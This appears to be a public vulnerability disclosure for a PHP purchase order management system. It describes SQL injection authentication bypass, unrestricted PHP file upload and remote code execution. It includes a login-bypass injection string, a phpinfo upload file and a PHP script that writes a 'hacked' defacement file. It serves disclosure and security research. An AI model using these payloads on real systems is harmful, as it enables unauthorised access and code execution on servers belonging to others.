## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK
1. SQLi Bypass Authentication
2. File Upload
3. RCE
## Latest update from the vendor: 5 hours 32 minutes ago
## Author: nu11secur1ty
## Date: 05/07/2024
## Vendor: https://github.com/oretnom23
## Software:
https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection,
https://portswigger.net/web-security/file-upload,
https://portswigger.net/web-security/authentication

## Description:
SQLi-Bypass-Authentication:
The username parameter is not sanitizing well, the attacker can bypass
authentication and login to the system.

---------------------------------------------------------------------------------------------------------------------------------------
FU:
Using this vulnerability, the attacker can upload any PHP file on the
server.
The parameter id="cimg" is not sanitizing securely.
STATUS: CRITICAL- Vulnerability

---------------------------------------------------------------------------------------------------------------------------------------
RCE:
The attacker can upload a malicious file with hazardous content. Then he
can use it to create another file on the server.
STATUS: CRITICAL- Vulnerability

[+]Exploits:
- SQLi bypass authentication:
```mysql
nu11secur1ty' or 1=1#
```

- FU:
```
<?php
phpinfo();
?>
```

- SQLi - Bypass-Authentication:
```
<?php
// by nu11secur1ty - 2023
$fh = fopen('test.html', 'a');
fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');
fclose($fh);
//unlink('test.html');
?>
```

## Reproduce:
[href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653)

## Proof and Exploit:
[href](
https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html
)

## Time spent:
00:35:00